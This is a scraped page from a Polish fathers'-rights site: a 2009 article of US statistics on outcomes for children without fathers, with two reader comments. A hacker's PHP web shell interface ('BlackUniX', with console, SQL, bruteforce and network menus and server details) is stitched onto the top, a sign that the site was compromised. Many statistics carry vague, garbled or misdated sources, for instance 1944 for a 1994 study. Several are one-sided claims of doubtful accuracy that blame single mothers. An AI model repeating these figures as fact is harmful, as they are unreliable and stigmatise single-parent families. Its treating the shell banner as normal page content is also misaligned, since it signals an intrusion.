W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-18 13:18:25
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.196.42.146
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Amerykańskie statystyki dotyczące konsekwencji nieobecności ojca w rodzinie
12.02.2009.
66.2% samotnych matek opiekunów pracuje w niepełnym wymiarze czasu
10.2% samotnych ojców opiekunów pracuje w niepełnym wymiarze czasu
7.0% samotnych matek opiekunów pracuje dłużej niż 44 godziny tygodniowo
24.5% samotnych ojców opiekunów pracuje dłużej niż 44 godziny tygodniowo 
46.2% samotnych matek opiekunów otrzymuje pomoc publiczną
20.8% samotnych ojców opiekunów otrzymuje pomoc publiczną
Źródło statystyczne: Arkusz Analizy Technicznej Nr 42 – Amerykańskie Ministerstwo Zdrowia i Opieki Społecznej –Biuro Polityki Bezpieczeństwa Dochodowego 90.2% ojców z opieką naprzemienną płaci wszelkie należne wsparcie
79.1% ojców z prawem do wizyt płaci wszelkie należne wsparcie
44.5% bez prawa do wizyt płaci wszelkie należne wsparcie
37.9% ojców ma zabronione jakiekolwiek wizyty
66.0% wszelkiego wsparcia nie zapłaconego przez ojców nie opiekunów wynika z niezdolności do zapłaty
Źródło statystyczne: Spis Ludności 1988  "Utrzymanie Dziecka, a Alimenty: 1989 Seria P-60, Nr 173 s. 6-7. Oraz  Raport Amerykańskiego Głównego Biura Rachunkowości" GAO/HRD-92-39FS Styczeń, 1992


50% matek nie dostrzega znaczenia stałego kontaktu ojca z jego dziećmi.
--Patrz Joan Berlin Kelly "Przetrwanie Rozpadu Małżeństwa" 


40% matek wyznało, że ograniczało wizyty ojca, aby ukarać byłego małżonka.
--Patrz "Częstotliwość Wizyt...."  Stanford Braver, Amerykańskie czasopismo ortopsychiatryczne

63% samobójstw wśród młodzieży występuje w populacji z rodzin gdzie nie było ojców
-- Amerykański Departament. Zdrowia i Usług. Medycznych (DHHS), Biuro Spisu Ludności

85% wszystkich dzieci, które wykazują zaburzenia behawioralne pochodzi z rodzin, w których nie było ojca
--Centrum Zwalczania Chorób

80% gwałcicieli powodowanych przeniesionym gniewem pochodzi z domów, w którym nie było ojca
--Wymiar Sprawiedliwości w Sprawach Karnych i Behawioralnych, Tom 14, s. 403-26

71% porzucających szkołę pochodzi z rodzin, w których nie było ojca
--Raport Krajowego Stowarzyszenia Dyrektorów o Stanie Szkół Wyższych

70% nieletnich w instytucjach państwowych o charakterze pozarządowym pochodzi z rodzin, w których nie było ojca
--Amerykańskie Ministerstwo Sprawiedliwości, Raport Specjalny Wrzesień, 1988

85% młodzieży siedzącej w więzieniach dorastało w rodzinach, w których nie było ojca
-- Hrabstwo Fulton Populacje więzienne Georgia & Teksański Departament Wychowania, 1992

Dzieci z rodzin, w których nie było ojca:
•    5 razy bardziej prawdopodobnie popełnią samobójstwo
•    32 razy prawdopodobniej uciekną z domu
•    mieć 20 razy prawdopodobniej będą cierpieć na zaburzenia behawioralne
•    14 razy prawdopodobniej popełnią gwałt
•    9 razy prawdopodobniej przewrwa naukę w szkole
•    10 razy prawdopodobniej będą nadużywać substancji chemicznych
•    20 razy prawdopodobniej skończą w więzieniu.
W trakcie badania 700 nieletnich, badacze odkryli, że "porównując do rodzin z obojgiem biologicznych rodziców żyjących w domu, nieletni z niepełnych rodzin wcześniej wkraczają w pełne życie seksualne."
Źródło: Carol W. Metzler,  "Społeczny Kontekst Ryzykownych Zachowań Seksualnych Wśród Nieletnich", Czasopismo Medycyny Behawioralnej 17 (1994).

"Dzieci pozbawione ojców są dużo bardziej narażone na nadużywanie alkoholu i narkotyków, choroby umysłowe, samobójstwo, słabe wyniki w szkole, nastoletnią ciążę i przestępczość."
Źródło: Departament Zdrowia i Opieki Społecznej Stanów Zjednoczonych, Krajowe Centrum Statystyk Zdrowotnych, Krajowa Inspekcja Stanu Zdrowia, Waszyngton, 1993.

"Młodzież żyjąca w niepełnych rodzinach jest bardziej narażona na nadużywanie alkoholu , a także na rozpoczęcie jego spożywania w młodszym wieku niż dzieci wychowywane w pełnych rodzinach."
Źródło: Terry E. Duncan, Susan C. Duncan i Hyman Hops, "Wpływ spójności Rodziny i Poparcia Rówieśniczego w Rozwoju Młodzieńczego Spożycia Alkoholu: Grupa wspierająca-Kolejne podejście do Analizy Danych Przekrojowych", Czasopismo Badań nad Alkoholem 55 (1994).

"...brak ojca w domu wpływa znacznie na zachowanie nieletnich i skutkuje większym spożyciem alkoholu i marihuany."
Źródło: Deane Scott Berman "Czynniki Ryzyka Prowadzące do Nadużywania Substancji Przez Nieletnich", Dojrzewanie 30 (1995)

Badacze w  Michigan określili, że "49 procent wszelkich przypadków wykorzystywania seksualnego nieletnich jest popełniane przez samotne matki."
Źródło: Joan Ditson i Sharon Shay, "Badanie Wykorzystywania Nieletnich Lansing, Michigan", Wykorzystywanie Nieletnich i Zaniedbanie, 8 (1984).

"Wskaźnik struktury rodziny – złożony wskaźnik bazujący na rocznej ilości dzieci uwikłanych w rozwody i odsetek rodzin z dziećmi, które są prowadzone przez kobietę – jest silnym prognostykiem samobójstw wśród młodych pełnoletnich i dojrzewających białych mężczyzn."
Źródło: Patricia L. McCall i Kenneth C. Land, "Trendy w Samobójstwach popełnianych przez Białych Dojrzewających Mężczyzn, Białych Pełnoletnich i Starszych: Czy Znajdują się tam Powszechne Podstawowe Czynniki Strukturalne" Badania Nauk Społecznych 23, 1994.

" Dzieci wychowywane bez ojca mają radykalnie większe prawdopodobieństwo na popełnienie samobójstwa."
Źródło: Departament Zdrowia i Opieki Społecznej Stanów Zjednoczonych, Krajowe Centrum Statystyk Zdrowotnych, Krajowa Inspekcja Stanu Zdrowia, Waszyngton, 1993.
 

Badając 146 dojrzewających przyjaciół 26 dojrzewających ofiar samobójstw, stwierdzono, że młodzież żyjąca w niepełnych rodzinach jest nie tylko bardziej narażona na popełnienie samobójstwa, ale również na dolegliwości związane z zaburzeniami psychologicznymi w porównaniu do młodzieży żyjącej w pełnych rodzinach. 
Źródło: David A. Brent, i inni "Zaburzenia Stresu Posttraumatycznego u Rówieśników Ofiar Samobójstw w Okresie Dojrzewania: Czynniki Predysponujące i Fenomenologia.", Amerykańska Akademia Psychiatrii Dzieci i Młodzieży 34, 1995.

"Chłopcy dorastający w rodzinach, w których nie ma ojca są bardziej narażeni na problemy a ustaleniem właściwych roli płci i tożsamości płci niż ci wychowywani w pełnych rodzinach."
Źródło: P.L. Adams, J.R. Milner, i N.A. Schrepf, "Dzieci wychowywane bez ojca", Nowy York, Wiley Press, 1984.

"W 1988, badanie dzieci przedszkolnych pozostawionych w szpitalach Nowego Orleanu jako pacjenci psychiatryczni w ciągu 34 miesięcy ujawniło, że blisko 80 procent z nich pochodzi z rodzin, w których nie ma ojca."
Źródło: Jack Block, i inni. "Funkcjonowanie Rodzicielskie i Środowisko Domowe w Rodzinach Porozwodowych", Czasopismo Amerykańskiej Akademii Psychiatrii Dzieci i Młodzieży, 27 (1988)

"Dzieci żyjące z nigdy niezamężną matką są bardziej narażone na prawdopodobieństwo leczenia w zakresie problemów emocjonalnych."
Źródło: L. Remez, "Dzieci, Które Nie Żyją z Obojgiem Rodziców Stają w obliczu Behawioralnych Problemów," Perspektywy Planowania Rodziny (Styczeń/Luty 1992).

Dzieci wychowywane przez rozwiedzioną lub nigdy niezamężną matkę, są mniej skłonne do współpracy i uzyskują niższe wyniki na testach inteligencji niż dzieci wychowywane w pełnych rodzinach. Analizy statystyczne zachowania i inteligencji tych dzieci ujawniły znaczące szkodliwe skutki “ życia w gospodarstwie domowym prowadzonym przez kobietę. Dorastanie w prowadzonym przez kobietę gospodarstwie domowym pozostaje statystycznym prognostykiem problemów behawioralnych nawet po wyrównaniu różnic w dochodach rodziny. 
Źródło: Greg L. Duncan, Jeanne Brooks-Gunn i Pamela Kato Klebanov, "Ubóstwo Ekonomiczne, a Wczesny Rozwój Dziecka", Rozwój Dziecka 65 (1994).

"Poddając kontroli zróżnicowania w przekroju grup, jeśli chodzi o wykształcenie rodzica, rasę i inne czynniki dziecka i rodziny,  osoby od 18 do 22 roku życia, z rozbitych rodzin były dwa razy bardziej narażone na złe stosunki międzyludzkie z ich matkami i ojcami, ukazuje to wyższe poziomy stresu emocjonalnego lub problem behawioralny, wymagający uzyskania pomocy psychologicznej."
Źródło: Nicholas Zill, Donna Morrison, i Mary Jo Coiro, "Długoterminowy Wpływ Rozwodu Rodziców na Stosunki Rodzic - Dziecko, Naprawa i Osiągnięcie we Wczesnym Pełnoletnim Życiu", Czasopismo Rodziny i Psychologii 7 (1993).

"Dzieci, które mają w domu ojca przejawiają tendencję do lepszej nauki w szkole, są mniej narażone na depresję i odnoszą sukcesy w relacjach międzyludzkich. Dzieci z niepełnych rodzin osiągają mniej i wpadają w tarapaty częściej niż dzieci z pełnych rodzin."
Źródło: Rodziny niepełne i ich dzieci: Najbardziej znacząca mniejszość w szkole, prowadzona przez Konsorcjum na Rzecz Badań Szkolnych Potrzeb Dzieci z Niepełnych Rodzin, współsponsorowane przez Krajowe Stowarzyszenie Dyrektorów Szkół Podstawowych i Instytut Rozwoju Aktywności Edukacyjnej, oddział Fundacji Charlesa F. Keterringa, Arlington, VA., 1980

"Dzieci których rodzice znajdują się w separacji mają dużo większe prawdopodobieństwo na wczesne rozpoczęcie życia seksualnego, narkomanię oraz zaburzenia behawioralne i nastroju. Ten efekt jest szczególnie silny u dzieci, których rodzice rozpoczęli separację, gdy one miały 5 lub mniej lat."
Źródło: David M. Fergusson, John Horwood i Michael T. Lynsky, "Rodzicielska Separacja, Psychopatologia Młodzieży i Problemowe Zachowania", Czasopismo Amerykańskiej Akademii Psychiatrii Dzieci i Młodzieży 33 (1944)


"W porównaniu do rówieśników żyjących z obojgiem rodziców biologicznych, synowie i córki rozwiedzionych lub żyjących w separacji rodziców wykazują znacznie więcej problemów behawioralnych. Córki rozwiedzionych lub będących w separacji matek wykazują znacznie wyższą ilość problemów przystosowawczych takich jak niepokój lub depresja."
Źródło: Denise B. Kandel, Emily Rosenbaum i Kevin Chen, "Wpływ Macierzyńskiej Narkomanii i Doświadczeń Życiowych na Dzieci Przed Okresem Dojrzewania Urodzone Przez Nastoletnie Matki", Czasopismo Małżeństwa i Rodziny 56 (1994).

"Głód ojca " często dotyka chłopców w wieku jednego i dwóch lat, których ojcowie niespodziewanie i na stałe znikają. Zaburzenia snu takie jak kłopoty z zaśnięciem, koszmary i nocne przerażenie zaczynają się często w ciągu od jednego do trzech miesięcy po zniknięciu ojca. 
Źródło: Alfred A. Messer, "Chłopięcy Głód Ojca: Syndrom Brakującego Ojca", Aspekty Medyczne Ludzkiej Seksualności, Styczeń 1989.

"Dzieci nigdy niezamężnych matek są więcej niż  dwukrotnie bardziej narażone na leczenie z problemów emocjonalnych lub behawioralnych."
Źródło: Departament Zdrowia i Opieki Społecznej Stanów Zjednoczonych, Krajowe Centrum Statystyk Zdrowotnych, Krajowa Inspekcja Stanu Zdrowia, Hyattsille, MD, 1988

W 1988 badania prowadzone przez Departament Zdrowia i Opieki Społecznej Stanów Zjednoczonych ujawniły, że przy każdym poziomie dochodu za wyjątkiem bardzo wysokiego (ponad $50,000 rocznie), dzieci żyjące z nigdy niezamężnymi matkami były bardziej narażone niż ich odpowiedniki z pełnych rodzin na wydalenie lub zawieszenie w szkole, na przejawianie problemów emocjonalnych oraz na włączanie się do działań aspołecznych.
Źródło: James Q. Wilson, "W miejsce rodzica: Pomoc Dzieciom, Gdy Rodziny Je Zawodzą", Analiza Brooklinga, Jesień 1993.

W trakcie długoterminowego badania 1197 uczniów czwartej klasy, badacze zaobserwowali "większe poziomy agresji u chłopców wychowywanych jedynie przez matkę niż u chłopców pochodzących z pełnych rodzin."
Źródło: N. Vaden-Kierman, N. Ialongo, J. Pearson, i S. Kellam, "Struktura Rodzinnego Gospodarstwa Domowego, a Agresywne Zachowanie Dzieci: Badanie długoterminowe Dzieci Miejskiej Szkoły Podstawowej", Czasopismo Nieprawidłowej Psychiki Dziecka 23, nr 5 (1995).

"Dzieci z rodzin samotnych matek mają mniejszą zdolność do opóźnienia satysfakcji i słabszą kontrolę odruchów (tj. kontrolę nad gniewem i satysfakcją seksualną). Te dzieci mają również słabsze poczucie świadomości, czy poczucie dobra lub zła."
Źródło: E.M. Hetherington i B. Martin, "Wzajemne relacje rodzinne " w H.C. Quay i J.S. Werry, Psychopatologiczne Zaburzenia Dzieciństwa. (Nowy York: John Wiley i synowie, 1979)

"Osiemdziesiąt procent młodzieży znajdującej się w szpitalach psychiatrycznych pochodzi z rozbitych rodzin."
Źródło: J.B. Elshtain, "Sprawy rodzinne... ", Christian Century, Lipiec 1993.
 
« poprzedni artykuł   następny artykuł »

komentarze

trafny komentarz dodałbym tu jeszcze panie biegłe z rodku i sądy rodzinne + wiele pań psycholog (nie wszystkie niektóre to rozumieja)

Napisał krzysztof007, dzień 02/16/2009 o 15:25

Żeby to moja żona to przeczytała i przyjęła do wiadomości nasze dzieci byłyby szczęśliwe-piotr

Napisał zalesianin, dzień 02/15/2009 o 16:54

 1 
Strona 1 z 1 ( 2 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


18.06.2018.